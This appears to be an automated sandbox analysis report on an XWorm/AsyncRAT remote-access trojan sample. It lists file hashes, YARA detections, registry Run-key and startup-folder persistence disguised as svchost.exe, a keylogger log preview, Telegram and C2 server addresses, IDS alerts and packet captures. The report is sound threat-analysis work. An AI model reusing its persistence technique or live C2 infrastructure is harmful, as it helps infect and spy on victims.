https://dynamic.t | svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366061020.0000027E7985D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.bingmapsportal.comsv | svchost.exe, 00000002.00000002.1366625213.0000027E79813000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | yF21ypxRB7.exe, 00000000.00000002.3701617400.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
147.185.221.23 | perfect-invest.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557207
Start date and time: 2024-11-17 19:23:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: yF21ypxRB7.exe
renamed because original name is a hash value
Original Sample Name: b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/5@3/2
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 33.3%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 97%
                                                                                                • Number of executed functions: 20
                                                                                                • Number of non-executed functions: 1
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7584 because it is empty
                                                                                                • Execution Graph export aborted for target svchost.exe, PID 7788 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                • VT rate limit hit for: yF21ypxRB7.exe
Time | Type | Description
13:24:11 | API Interceptor | 15271065x Sleep call for process: yF21ypxRB7.exe modified
15:22:24 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
19:24:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
19:24:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
19:24:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                149.154.167.220PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
download.exe | malicious | Remcos, XWorm
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger
https://t.ly/-kxCO | malicious | Braodo
dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger
Lista de cotizaciones.exe | malicious | DarkCloud
CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer
CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer
Match: 147.185.221.23
9GlCWW6bXc.exe | malicious | XWorm
fiPZoO6xvJ.exe | malicious | XWorm
EternalPredictor.exe | malicious | Blank Grabber, Skuld Stealer, XWorm
eternal.exe | malicious | XWorm
svchost.exe | malicious | Unknown
msedge_visual_render.exe | malicious | XWorm
exe030.exe | malicious | XWorm
pQm8Ci3Dov.exe | malicious | XWorm
jkL96SLfWS.exe | malicious | XWorm
xtrSvgqQEW.exe | malicious | XWorm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: api.telegram.org
PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
download.exe | malicious | Remcos, XWorm | 149.154.167.220
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Lista de cotizaciones.exe | malicious | DarkCloud | 149.154.167.220
CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: TELEGRAMRU
PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
download.exe | malicious | Remcos, XWorm | 149.154.167.220
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
https://t.ly/-kxCO | malicious | Braodo | 149.154.167.220
dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Lista de cotizaciones.exe | malicious | DarkCloud | 149.154.167.220
CloudServices_Slayed.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
CloudServices.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
Match: SALSGIVERUS
OXhiMvksgM.exe | malicious | XWorm | 147.185.221.22
9GlCWW6bXc.exe | malicious | XWorm | 147.185.221.23
fiPZoO6xvJ.exe | malicious | XWorm | 147.185.221.23
EternalPredictor.exe | malicious | Blank Grabber, Skuld Stealer, XWorm | 147.185.221.23
eternal.exe | malicious | XWorm | 147.185.221.23
svchost.exe | malicious | Unknown | 147.185.221.23
msedge_visual_render.exe | malicious | XWorm | 147.185.221.23
exe030.exe | malicious | XWorm | 147.185.221.23
pQm8Ci3Dov.exe | malicious | XWorm | 147.185.221.23
jkL96SLfWS.exe | malicious | XWorm | 147.185.221.23
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
file.exe | malicious | LummaC | 149.154.167.220
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 149.154.167.220
0a0#U00a0.js | malicious | RHADAMANTHYS | 149.154.167.220
file.exe | malicious | LummaC | 149.154.167.220
file.exe | malicious | LummaC, Amadey, Stealc, Vidar | 149.154.167.220
file.exe | malicious | LummaC | 149.154.167.220
1Eo0gOdDsV.exe | malicious | Quasar | 149.154.167.220
file.exe | malicious | LummaC | 149.154.167.220
4c9ebxnhQk.exe | malicious | Unknown | 149.154.167.220
o4QEzeCniw.exe | malicious | Unknown | 149.154.167.220
No context
Process: C:\Users\user\AppData\Roaming\svchost.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process: C:\Users\user\Desktop\yF21ypxRB7.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 41
Entropy (8bit): 3.7195394315431693
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5: 0DB526D48DAB0E640663E4DC0EFE82BA
SHA1: 17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256: 934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512: FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious: false
Preview: ....### explorer ###..[WIN]r[WIN]r[WIN]r
Process: C:\Users\user\Desktop\yF21ypxRB7.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 17 17:24:09 2024, mtime=Sun Nov 17 17:24:09 2024, atime=Sun Nov 17 17:24:09 2024, length=39936, window=hide
Category: dropped
Size (bytes): 768
Entropy (8bit): 5.081788969415218
Encrypted: false
SSDEEP: 12:8c71c24DN+2Chqi1Y//YjluILeN8N/ijA2NHkuWMbKJ2JzBmV:86mg2J98ltM/ABZMbKJ2Jtm
MD5: 0F1B1E9D385411B380D24343707FB74E
SHA1: F8CDD6276FFA0D012CB483AE83F58F85CBD1A952
SHA-256: 5A4F037C24ED8F4536B1298A7F3C9DD564F27DA2779FDEFD49200FA58B780282
SHA-512: 2180B56CAD37317A90179F6D9FCAC73392D7DF6AED52FD1206336AC9F9AF43CB4D3D4B760948248820038E6E387CC78833932CBC7B26405833C697B09F1D0311
Malicious: false
                                                                                                                                        Preview:L..................F.... ........9.......9.......9..........................v.:..DG..Yr?.D..U..k0.&...&......Qg.*_...L....9.......9......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=qY............................3*N.A.p.p.D.a.t.a...B.V.1.....qY....Roaming.@......EW.=qY..............................'.R.o.a.m.i.n.g.....b.2.....qY.. .svchost.exe.H......qY..qY......6.....................S...s.v.c.h.o.s.t...e.x.e.......]...............-.......\...........|dWy.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......618321...........hT..CrF.f4... .t../Tc...,......hT..CrF.f4... .t../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process: C:\Users\user\Desktop\yF21ypxRB7.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 39936
Entropy (8bit): 5.5733994405622935
Encrypted: false
SSDEEP: 768:feMIxy4cStkT1MfdDtVISFp9ITOMhkbF:feMIxnmpM5X3Fp9ITOMiJ
MD5: 640194B0D51307F362B74FD4A4A1761D
SHA1: 8E623F6BA2C87803F079B85578289359D71C6C90
SHA-256: B31D01D8E826EA4773CD7CFDBFCA3712287024C03463ACB374B5040AF27FAE71
SHA-512: 7631827A014041C8066E334584116DB7A3320DE4FBBAE285C9C87BCCC53381DDC525ADD1F031E5920E01450155AA22B1550DE2725FF213EA9FBB3E5C26118DC2
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9g............................^.... ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H........Z...U............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: modified
Size (bytes): 2464
Entropy (8bit): 3.2500083760919267
Encrypted: false
SSDEEP: 24:QOaqdmuF3r1U+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxX:FaqdF71U+AAHdKoqKFxcxkF/q
MD5: 8AC922FDE84974AAA4492E69942C7F3F
SHA1: E6899CEFD5879856926C4B99B3AB20CF87DF2346
SHA-256: 242BEA5557BB5D87BD7C008D6A229EA8CFA802A256CF516A375E0B39D95E6659
SHA-512: E8FEB93CC28520B13602E25AE61C60483DD4591741FBB2D2E466D1F5C3B68D49BA9298502A8A117E59EA5B5E42CC8931DC56C6216B98577A45EF729C99CEB81A
Malicious: false
                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.7. .. 2.0.2.4. .1.5.:.2.2.:.2.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):5.5733994405622935
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        File name:yF21ypxRB7.exe
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5:640194b0d51307f362b74fd4a4a1761d
                                                                                                                                        SHA1:8e623f6ba2c87803f079b85578289359d71c6c90
                                                                                                                                        SHA256:b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71
                                                                                                                                        SHA512:7631827a014041c8066e334584116db7a3320de4fbbae285c9c87bccc53381ddc525add1f031e5920e01450155aa22b1550de2725ff213ea9fbb3e5c26118dc2
                                                                                                                                        SSDEEP:768:feMIxy4cStkT1MfdDtVISFp9ITOMhkbF:feMIxnmpM5X3Fp9ITOMiJ
                                                                                                                                        TLSH:4E035C487BD84225EDFEAFFA5AB365020631F5078A13E78D0CD5C99A2F67BC089017D6
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9g............................^.... ........@.. ....................................@................................
                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                        Entrypoint:0x40b05e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x6739F619 [Sun Nov 17 13:56:41 2024 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb004 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9064 | 0x9200 | fa55860fc7599b8f47a8ea5026414c37 | False | 0.4941941352739726 | data | 5.696419955770787 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4e0 | 0x600 | 3c7b6deec83918c8351b51ed3dfb02ce | False | 0.3776041666666667 | data | 3.73454411513876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 59691adaa515e6f6430f673862d3bf7f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x24c | data | | | 0.4744897959183674
RT_MANIFEST | 0xc2f0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-17T19:24:11.934770+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.7 | 49699 | 149.154.167.220 | 443 | TCP
2024-11-17T19:25:22.211608+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49978 | 147.185.221.23 | 61586 | TCP
2024-11-17T19:26:29.897915+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49984 | 147.185.221.23 | 61586 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 19:24:10.720700979 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:10.720741034 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:10.720840931 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:10.738679886 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:10.738709927 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.587714911 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.587869883 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:11.592324972 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:11.592346907 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.592665911 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.643884897 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:11.651281118 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:11.691334963 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.934837103 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.934916019 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.7
Nov 17, 2024 19:24:11.935019970 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:11.948642969 CET | 49699 | 443 | 192.168.2.7 | 149.154.167.220
Nov 17, 2024 19:24:12.134409904 CET | 49700 | 61586 | 192.168.2.7 | 147.185.221.23
Nov 17, 2024 19:24:12.139413118 CET | 61586 | 49700 | 147.185.221.23 | 192.168.2.7
Nov 17, 2024 19:24:12.139498949 CET | 49700 | 61586 | 192.168.2.7 | 147.185.221.23
Nov 17, 2024 19:24:12.265532017 CET | 49700 | 61586 | 192.168.2.7 | 147.185.221.23
Nov 17, 2024 19:24:12.271155119 CET | 61586 | 49700 | 147.185.221.23 | 192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.615082979 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.615169048 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.686491013 CET4970061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.689570904 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.691874981 CET6158649700147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.694475889 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:20.694576979 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.798803091 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:20.803695917 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:29.177118063 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:29.177207947 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.482861042 CET4972561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.484981060 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.488018036 CET6158649725147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:30.491640091 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:30.491729975 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.790599108 CET4978661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:24:30.795581102 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:38.964934111 CET6158649786147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:38.964993000 CET4978661586192.168.2.7147.185.221.23
